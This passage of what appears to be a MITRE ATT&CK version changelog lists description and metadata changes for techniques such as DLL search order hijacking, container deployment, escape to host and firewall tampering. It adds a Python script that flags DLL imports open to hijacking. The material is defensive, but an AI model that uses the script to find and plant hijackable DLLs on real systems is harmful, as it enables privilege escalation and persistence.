depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
description (New value): Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module. Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'Adversaries Hijack DLLs', 'description': 'CrowdStrike, Falcon OverWatch Team. (2022, December 30). Retrieved October 19, 2023.', 'url': 'https://www.crowdstrike.com/blog/4-ways-adversaries-hijack-dlls/'}
x_mitre_contributors | | Marina Liang
x_mitre_contributors | | Will Alexander
x_mitre_contributors | | Ami Holeston
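The new T1574.001 text adds phantom DLL hijacking next to preloading and redirection; what the variants share is the search order itself, so an assessment has to walk that order rather than just look for writable directories. The Python below is an added example (not code from ATT&CK, from Microsoft or from the cited CrowdStrike write-up) that models the documented default order with SafeDllSearchMode enabled and with it disabled, resolves each imported DLL name against a constructed filesystem model, and reports whether an unprivileged user could plant a DLL in a directory searched before the legitimate copy (hijackable) or in place of a DLL that exists nowhere (phantom). The directory layout, the writable-directory set, the import list and the small KnownDLLs subset are assumptions made for this example.

```python
"""Resolve a program's DLL imports along the Windows search order and flag
what an unprivileged user could hijack (T1574.001).

Default order with SafeDllSearchMode enabled: application directory, system
directory, 16-bit system directory, Windows directory, current directory,
then the PATH directories. With SafeDllSearchMode disabled the current
directory is searched second. KnownDLLs skip the search and come from the
system directory. The filesystem layout, writable directories, import list
and KnownDLLs subset below are constructed for this example.
"""
from __future__ import annotations

from dataclasses import dataclass

SYSTEM_DIR = r"C:\Windows\System32"
SYSTEM16_DIR = r"C:\Windows\System"
WINDOWS_DIR = r"C:\Windows"

# Assumed subset; the real list is the KnownDLLs key under
# HKLM\SYSTEM\CurrentControlSet\Control\Session Manager.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "user32.dll", "advapi32.dll"}


@dataclass(frozen=True)
class Finding:
    dll: str
    kind: str                  # "safe" | "hijackable" | "phantom" | "missing"
    resolved_from: str | None  # where the loader finds the legitimate DLL
    plant_in: str | None       # first user-writable directory searched before that


def search_order(app_dir: str, cwd: str, path_dirs: list[str],
                 safe_dll_search_mode: bool = True) -> list[str]:
    """Directories in the order the loader tries them for a bare DLL name."""
    if safe_dll_search_mode:
        order = [app_dir, SYSTEM_DIR, SYSTEM16_DIR, WINDOWS_DIR, cwd]
    else:
        order = [app_dir, cwd, SYSTEM_DIR, SYSTEM16_DIR, WINDOWS_DIR]
    return order + list(path_dirs)


def analyse(imports: list[str], fs: dict[str, set[str]], writable: set[str],
            app_dir: str, cwd: str, path_dirs: list[str],
            safe_dll_search_mode: bool = True) -> list[Finding]:
    """fs maps a directory to the lowercase file names in it; writable is the
    set of directories the unprivileged user can write to."""
    findings = []
    for name in imports:
        dll = name.lower()
        if dll in KNOWN_DLLS:
            findings.append(Finding(dll, "safe", SYSTEM_DIR, None))
            continue
        resolved = plant = None
        for d in search_order(app_dir, cwd, path_dirs, safe_dll_search_mode):
            if dll in fs.get(d, set()):
                resolved = d          # legitimate copy found; the search stops
                break
            if plant is None and d in writable:
                plant = d             # a writable directory is searched earlier
        if resolved is None:
            kind = "phantom" if plant else "missing"
        elif plant is not None:
            kind = "hijackable"
        else:
            kind = "safe"
        findings.append(Finding(dll, kind, resolved, plant))
    return findings


# Constructed environment: a vendor application launched from the user's
# Downloads folder, with a per-user tools folder on PATH.
APP_DIR = r"C:\Program Files\Vendor\App"
CWD = r"C:\Users\alice\Downloads"
TOOLS_DIR = r"C:\Users\alice\AppData\Local\Tools"
PATH_DIRS = [SYSTEM_DIR, TOOLS_DIR]
FS = {
    APP_DIR: {"app.exe", "vendor.dll"},
    SYSTEM_DIR: KNOWN_DLLS | {"version.dll", "dbghelp.dll"},
    WINDOWS_DIR: set(),
    CWD: set(),
    TOOLS_DIR: set(),
}
WRITABLE = {CWD, TOOLS_DIR}
IMPORTS = ["KERNEL32.dll", "vendor.dll", "VERSION.dll", "telemetry.dll"]

if __name__ == "__main__":
    for safe in (True, False):
        print(f"SafeDllSearchMode={'on' if safe else 'off'}")
        for f in analyse(IMPORTS, FS, WRITABLE, APP_DIR, CWD, PATH_DIRS, safe):
            print(f"  {f.dll:<15} {f.kind:<11} from={f.resolved_from} plant={f.plant_in}")
```

In the sample, telemetry.dll is a phantom import either way (nothing on the search path provides it, and the current directory is writable), while version.dll is only hijackable when SafeDllSearchMode is off and the current directory moves ahead of System32; that is the preloading case the description ties to programs launched from a user-controlled working directory. For real binaries the import list would come from the PE import and delay-load tables (the pefile module exposes both) and the writable set from ACL checks, with the resolution logic unchanged.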

[T1071.004] Application Layer Protocol: DNS

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-06-17 13:52:03.232000+00:00 | 2023-12-26 20:54:38.721000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New Value
x_mitre_platforms | | Network

[T1213] Data from Information Repositories

Current version: 3.3

Version changed from: 3.2 → 3.3

New Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-11 22:28:36.395000+00:00 | 2024-03-01 16:27:47.391000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 3.2 | 3.3

[T1078.001] Valid Accounts: Default Accounts

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2023-03-30 21:01:44.382000+00:00 | 2024-03-07 14:27:04.770000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1610] Deploy Container

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. Containers can be deployed by various means, such as via Docker's `create` and `start` APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)

New Description
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020) Containers can be deployed by various means, such as via Docker's `create` and `start` APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)

Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-15 16:13:40.232000+00:00 | 2024-04-11 21:24:42.680000+00:00
description | see Old Description above | see New Description above
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'AppSecco Kubernetes Namespace Breakout 2020', 'description': 'Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1. Retrieved January 16, 2024.', 'url': 'https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216'}
external_references | | {'source_name': 'Kubernetes Workload Management', 'description': 'Kubernetes. (n.d.). Workload Management. Retrieved March 28, 2024.', 'url': 'https://kubernetes.io/docs/concepts/workloads/controllers/'}
x_mitre_contributors | | Joas Antonio dos Santos, @C0d3Cr4zy

[T1006] Direct Volume Access

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-01 14:19:18.804000+00:002024-04-16 12:25:24.480000+00:00
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1562.004] Impair Defenses: Disable or Modify System Firewall

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)

New Description
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti) Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.

Details
values_changed
STIX Field | Old value | New value
modified | 2023-02-28 22:34:38.316000+00:00 | 2024-03-28 00:01:08.337000+00:00
description | see Old Description above | see New Description above
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'Huntress BlackCat', 'description': 'Carvey, H. (2024, February 28). BlackCat Ransomware Affiliate TTPs. Retrieved March 27, 2024.', 'url': 'https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps'}
x_mitre_platforms | | Network

[T1561.001] Disk Wipe: Disk Content Wipe

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-12 23:42:59.868000+00:002024-04-16 13:00:33.303000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1583.001] Acquire Infrastructure: Domains

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)

New Description
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-30 21:01:37.379000+00:00 | 2024-04-13 14:03:04.511000+00:00
description | see Old Description above | see New Description above
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'URI Unique', 'description': 'Australian Cyber Security Centre. National Security Agency. (2020, April 21). Detect and Prevent Web Shell Malware. Retrieved February 9, 2024.', 'url': 'https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF'}
external_references | | {'source_name': 'URI', 'description': 'Michael Cobb. (2007, October 11). Preparing for uniform resource identifier (URI) exploits. Retrieved February 9, 2024.', 'url': 'https://www.techtarget.com/searchsecurity/tip/Preparing-for-uniform-resource-identifier-URI-exploits'}
external_references | | {'source_name': 'URI Use', 'description': 'Nathan McFeters. Billy Kim Rios. Rob Carter.. (2008). URI Use and Abuse. Retrieved February 9, 2024.', 'url': 'https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf'}
external_references | | {'source_name': 'iOS URL Scheme', 'description': 'Ostorlab. (n.d.). iOS URL Scheme Hijacking. Retrieved February 9, 2024.', 'url': 'https://docs.ostorlab.co/kb/IPA_URL_SCHEME_HIJACKING/index.html'}
x_mitre_contributors | | Nikola Kovac

[T1585.002] Establish Accounts: Email Accounts

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1) To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)

New Description
Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for follow-on purposes.(Citation: Free Trial PurpleUrchin) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1) To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-15 03:09:59.862000+00:00 | 2024-02-28 21:11:27.088000+00:00
description | see Old Description above | see New Description above
x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'Free Trial PurpleUrchin', 'description': 'Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.', 'url': 'https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/'}

[T1573] Encrypted Channel

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.

New Description
Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-20 19:27:46.650000+00:00 | 2024-04-16 12:29:47.903000+00:00
description | see Old Description above | see New Description above
x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New value
x_mitre_platforms | | Network

[T1611] Escape to Host

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1Adversaries may break out of a container to gain access to tt1Adversaries may break out of a container to gain access to t
>he underlying host. This can allow an adversary access to ot>he underlying host. This can allow an adversary access to ot
>her containerized resources from the host level or to the ho>her containerized resources from the host level or to the ho
>st itself. In principle, containerized resources should prov>st itself. In principle, containerized resources should prov
>ide a clear separation of application functionality and be i>ide a clear separation of application functionality and be i
>solated from the host environment.(Citation: Docker Overview>solated from the host environment.(Citation: Docker Overview
>)  There are multiple ways an adversary may escape to a host>)  There are multiple ways an adversary may escape to a host
> environment. Examples include creating a container configur> environment. Examples include creating a container configur
>ed to mount the host’s filesystem using the bind parameter, >ed to mount the host’s filesystem using the bind parameter, 
>which allows the adversary to drop payloads and execute cont>which allows the adversary to drop payloads and execute cont
>rol utilities such as cron on the host; utilizing a privileg>rol utilities such as cron on the host; utilizing a privileg
>ed container to run commands or load a malicious kernel modu>ed container to run commands or load a malicious kernel modu
>le on the underlying host; or abusing system calls such as `>le on the underlying host; or abusing system calls such as `
>unshare` and `keyctl` to escalate privileges and steal secre>unshare` and `keyctl` to escalate privileges and steal secre
Old Description (continued): ...secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask) Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.

New Description (continued): ...secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask) Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host.
Details
values_changed
STIX Field | Old value | New Value
modified | 2023-04-15 16:21:04.265000+00:00 | 2024-04-19 12:42:18.632000+00:00
description | Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask) Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. | Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask) Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host.
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.4 | 1.5
iterable_item_added
STIX Field | Old value | New Value
x_mitre_contributors |  | Joas Antonio dos Santos, @C0d3Cr4zy
iterable_item_removed
STIX Field | Old value | New Value
x_mitre_contributors | Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics | 

[T1585] Establish Accounts

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)

New Description
Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for malicious purposes.(Citation: Free Trial PurpleUrchin)
Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version |  | 3.2.0
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New Value
modified | 2021-10-16 17:35:59.386000+00:00 | 2024-02-28 21:08:56.520000+00:00
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | Old value | New Value
external_references |  | {'source_name': 'Free Trial PurpleUrchin', 'description': 'Gamazo, William. Quist, Nathaniel. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.', 'url': 'https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/'}

[T1546] Event Triggered Execution

Current version: 1.3

Version changed from: 1.2 → 1.3

New Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-19 15:44:20.456000+00:00 | 2024-03-01 15:49:15.588000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[T1190] Exploit Public-Facing Application

Current version: 2.5

Version changed from: 2.4 → 2.5


Old Description
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration. Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero 